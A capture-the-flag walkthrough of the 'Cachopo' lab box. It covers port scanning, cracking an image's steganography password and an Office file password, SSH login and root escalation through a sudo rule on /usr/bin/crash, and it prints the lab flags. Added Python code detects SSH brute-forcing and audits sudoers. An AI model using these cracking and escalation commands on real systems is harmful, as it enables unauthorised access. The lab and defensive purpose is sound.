TheHackersLabs-Cachopo box walkthrough (WP)
By 城南花已开

Information gathering

Service detection

Port 80 is open

```text
sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.131 08:00:27:ff:d8:91 (Unknown)
192.168.60.254 00:50:56:fd:82:05 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.937 seconds (132.16 hosts/sec). 4 responded
❯ ip=192.168.60.131
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.131:22
Open 192.168.60.131:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 19:09 CST
Initiating ARP Ping Scan at 19:09
Scanning 192.168.60.131 [1 port]
Completed ARP Ping Scan at 19:09, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:09
Completed Parallel DNS resolution of 1 host. at 19:09, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:09
Scanning 192.168.60.131 [2 ports]
Discovered open port 22/tcp on 192.168.60.131
Discovered open port 80/tcp on 192.168.60.131
Completed SYN Stealth Scan at 19:09, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.131
Host is up, received arp-response (0.00060s latency).
Scanned at 2025-01-02 19:09:05 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:FF:D8:91 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
```

Add a hostname entry to /etc/hosts

```text
sudo vim /etc/hosts
❯ whatweb cachopo.thl
http://cachopo.thl [200 OK] Apache[2.4.61], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.61 (Debian)], IP[192.168.60.131], Title[Cachopo]
❯ curl cachopo.thl
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Cachopo</title>
<style>
body, html {
margin: 0;
padding: 0;
height: 100%;
width: 100%;
overflow: hidden; /* Evita que se muestren barras de desplazamiento */
}
.full-screen-image {
background-image: url('cachopo.jpg');
background-size: cover;
background-position: center;
background-repeat: no-repeat;
height: 100%;
width: 100%;
position: absolute;
}
</style>
</head>
<body>
<div class="full-screen-image"></div>
</body>
</html>
```

The homepage turns out to contain nothing but a single image.


I also tried scanning some directories, but found nothing.

Image steganography

I fetched the image with wget.

My guess was that the image contains hidden data.

```text
❯ wget http://cachopo.thl/cachopo.jpg
--2025-01-02 19:18:23-- http://cachopo.thl/cachopo.jpg
Resolving cachopo.thl (cachopo.thl)... 192.168.60.131
Connecting to cachopo.thl (cachopo.thl)|192.168.60.131|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 441718 (431K) [image/jpeg]
Saving to: ‘cachopo.jpg’

cachopo.jpg 100%[=======================================================================>] 431.37K --.-KB/s in 0.01s

2025-01-02 19:18:23 (32.4 MB/s) - ‘cachopo.jpg’ saved [441718/441718]
mv cachopo.jpg image.jpg
❯ stegcracker image.jpg
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2025 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

No wordlist was specified, using default rockyou.txt wordlist.
Counting lines in wordlist..
Attacking file 'image.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: doggies
Tried 4428 passwords
Your file has been written to: image.jpg.out
cat image.jpg.out
el directorio es mycachopo
```

The directory is mycachopo.

That is a hint: visiting the mycachopo directory shows a file.


After downloading it, it turns out to be an encrypted CDFV2 file.

Brute-force it to get the password.

```text
❯ office2john Cocineros >hash
❯ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2007 for all loaded hashes
Cost 2 (iteration count) is 50000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 14 candidates buffered for the current salt, minimum 32 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
horse1 (Cocineros)
1g 0:00:00:02 DONE 2/3 (2025-01-02 19:33) 0.4048g/s 4969p/s 4969c/s 4969C/s helene1..jamesbond1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

I tried entering the password in Word on Windows, but it would not open.


Installing LibreOffice in Kali opens it fine.


Hydra brute force

What it gives looks like three usernames: Sofia, Carlos and Luis.

I tried brute-forcing with those usernames.

It ran for ages and nothing came out.

Afterwards I read other people's writeups, and it turned out the usernames are all lowercase.

I logged in directly with the password.
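The Hydra run above is what a defender sees as a burst of "Failed password" lines from sshd in auth.log, followed (if a guess lands) by an "Accepted password" from the same source. As an added example, not part of the original writeup, here is a small Python detector that parses sshd password-auth lines in the stock OpenSSH syslog format, counts failures per source inside a sliding time window, flags sources that cross a threshold, and records whether a later successful login from that source followed the burst. The sample log lines, host name, process ids and thresholds are constructed for the demo; the only value taken from the writeup is 192.168.60.100, the scanning host's own address in the arp-scan output.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (not captured from the box): the failed attempts are
# what a Hydra-style guessing run against sshd looks like in /var/log/auth.log.
SAMPLE_AUTH_LOG = """\
Jan  2 19:40:01 Cachopo sshd[1201]: Failed password for invalid user Sofia from 192.168.60.100 port 40112 ssh2
Jan  2 19:40:01 Cachopo sshd[1202]: Failed password for invalid user Carlos from 192.168.60.100 port 40113 ssh2
Jan  2 19:40:02 Cachopo sshd[1203]: Failed password for invalid user Luis from 192.168.60.100 port 40114 ssh2
Jan  2 19:40:02 Cachopo sshd[1204]: Failed password for carlos from 192.168.60.100 port 40115 ssh2
Jan  2 19:40:03 Cachopo sshd[1205]: Failed password for carlos from 192.168.60.100 port 40116 ssh2
Jan  2 19:40:03 Cachopo sshd[1206]: Failed password for carlos from 192.168.60.100 port 40117 ssh2
Jan  2 19:41:10 Cachopo sshd[1210]: Accepted password for carlos from 192.168.60.100 port 40120 ssh2
Jan  2 19:45:00 Cachopo sshd[1300]: Failed password for sofia from 192.168.60.7 port 51000 ssh2
"""

# One syslog line from sshd: timestamp, host, process, then the auth result.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_line(line):
    """Return a dict for an sshd password-auth line, or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; strptime defaults to 1900, which is fine
    # because only differences between timestamps are used below
    ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failed logins inside any window_seconds span.

    Returns {ip: {flagged_at, failures, users_tried, success_user}} where
    success_user is the account that later logged in from a flagged source,
    or None if no successful login followed the burst.
    """
    recent = defaultdict(deque)   # sliding window of failure timestamps per source
    failures = defaultdict(int)   # total failures per source
    users = defaultdict(set)      # usernames tried per source
    flagged = {}                  # ip -> timestamp when the threshold was first crossed
    success_after = {}            # ip -> user that logged in after the burst

    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ip = ev["ip"]
        if ev["result"] == "Failed":
            failures[ip] += 1
            users[ip].add(ev["user"])
            q = recent[ip]
            q.append(ev["ts"])
            # drop failures that fell out of the window
            while (ev["ts"] - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = ev["ts"]
        elif ip in flagged:
            # "Accepted password" after a burst of failures: the high-signal case
            success_after[ip] = ev["user"]

    return {
        ip: {
            "flagged_at": flagged[ip].strftime("%H:%M:%S"),
            "failures": failures[ip],
            "users_tried": sorted(users[ip]),
            "success_user": success_after.get(ip),
        }
        for ip in flagged
    }


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

A source that crosses the threshold and then gets an "Accepted password" is the alert worth paging on; a source that only fails is the kind of thing fail2ban-style blocking handles on its own. The mixed-case names in `users_tried` are also a useful tell: a guessing run fed a list of display names, as in the writeup, shows up as accounts that do not exist on the box.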


User privilege escalation

```text
❯ ssh carlos@192.168.60.131
The authenticity of host '192.168.60.131 (192.168.60.131)' can't be established.
ED25519 key fingerprint is SHA256:TwxUt/2Cw+RBXmkw35lCwjyjcXY9BpomAJBscsWYUC4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.131' (ED25519) to the list of known hosts.
carlos@192.168.60.131's password:
Linux Cachopo 6.1.0-22-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.94-1 (2024-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jul 15 11:44:31 2024 from 192.168.1.41
carlos@Cachopo:~$ ls
user.txt
carlos@Cachopo:~$ cat user.txt
df24ed3c0e0c0ffa94ff3f5bd4b577d7
```

Root privilege escalation

Found sudo privileges.

Let's use them.

```text
carlos@Cachopo:~$ sudo /usr/bin/crash -h
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
a642074bfe5c59de6f1bc072e54478dc
```
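The root step works because sudo lets carlos run /usr/bin/crash as root, and crash is one of the binaries that can hand back a root shell, so the rule is equivalent to granting ALL. As an added example, not from the writeup, here is a Python audit of sudoers-style rules that flags non-root principals allowed to run either ALL or a watch-listed shell-capable binary as root. The sample sudoers content, the watch list (seeded with /usr/bin/crash only, because that is the binary on this box) and the parser's subset of the sudoers grammar (plain user/group rules; aliases and #include directives are skipped, not resolved) are assumptions made for the demo.

```python
import re

# Constructed sample sudoers content (not copied from the box). The carlos line
# mirrors what `sudo /usr/bin/crash -h` succeeding implies was granted; the
# other lines are made-up context for the audit.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
carlos  ALL=(root) NOPASSWD: /usr/bin/crash
backup  ALL=(root) /usr/bin/rsync --dry-run /srv/ /mnt/backup/
www-data ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
"""

# Binaries that give a shell when run as root. Seeded with the one from this
# box; extend it from your own baseline (assumption: not an exhaustive list).
SHELL_ESCAPE_BINARIES = {"/usr/bin/crash"}

# Tags that may prefix a command in a sudoers rule; they carry over to the
# following commands in the same list until another tag changes them.
SUDO_TAGS = ("NOPASSWD:", "PASSWD:", "SETENV:", "NOSETENV:", "EXEC:", "NOEXEC:",
             "LOG_INPUT:", "NOLOG_INPUT:", "LOG_OUTPUT:", "NOLOG_OUTPUT:")

# who  host=(runas[:group]) [TAG:] cmd, cmd ...
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


def parse_rules(text):
    """Yield (principal, runas_user, nopasswd, command) for each user/group rule."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and #include lines
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # no (runas) means the sudoers default, which is root
        runas = (m["runas"] or "root").split(":")[0].strip() or "root"
        nopasswd = False
        for spec in m["cmds"].split(","):
            spec = spec.strip()
            while True:  # peel off leading tags, keeping NOPASSWD/PASSWD state
                for tag in SUDO_TAGS:
                    if spec.startswith(tag):
                        if tag == "NOPASSWD:":
                            nopasswd = True
                        elif tag == "PASSWD:":
                            nopasswd = False
                        spec = spec[len(tag):].lstrip()
                        break
                else:
                    break
            yield m["who"], runas, nopasswd, spec


def audit_sudoers(text):
    """Return findings for rules that let a non-root principal reach a root shell."""
    findings = []
    for who, runas, nopasswd, cmd in parse_rules(text):
        if who == "root" or runas not in ("root", "ALL"):
            continue  # root itself, or a rule that does not run as root
        binary = cmd.split()[0] if cmd else ""
        if cmd == "ALL":
            reason = "unrestricted root command"
        elif binary in SHELL_ESCAPE_BINARIES:
            reason = "binary can spawn a shell as root"
        else:
            continue
        findings.append({"principal": who, "command": cmd,
                         "nopasswd": nopasswd, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['principal']:10} {f['command']:20} NOPASSWD={f['nopasswd']}  {f['reason']}")
```

The fix on a real system is the same regardless of which binary is involved: if a user needs a privileged program that can spawn a shell, the sudo rule does not contain the privilege, so either drop the rule or replace the program with a wrapper that exposes only the one operation needed. The `%sudo ALL` finding is expected on a stock Debian and is reported so that membership of that group gets reviewed alongside the explicit rules.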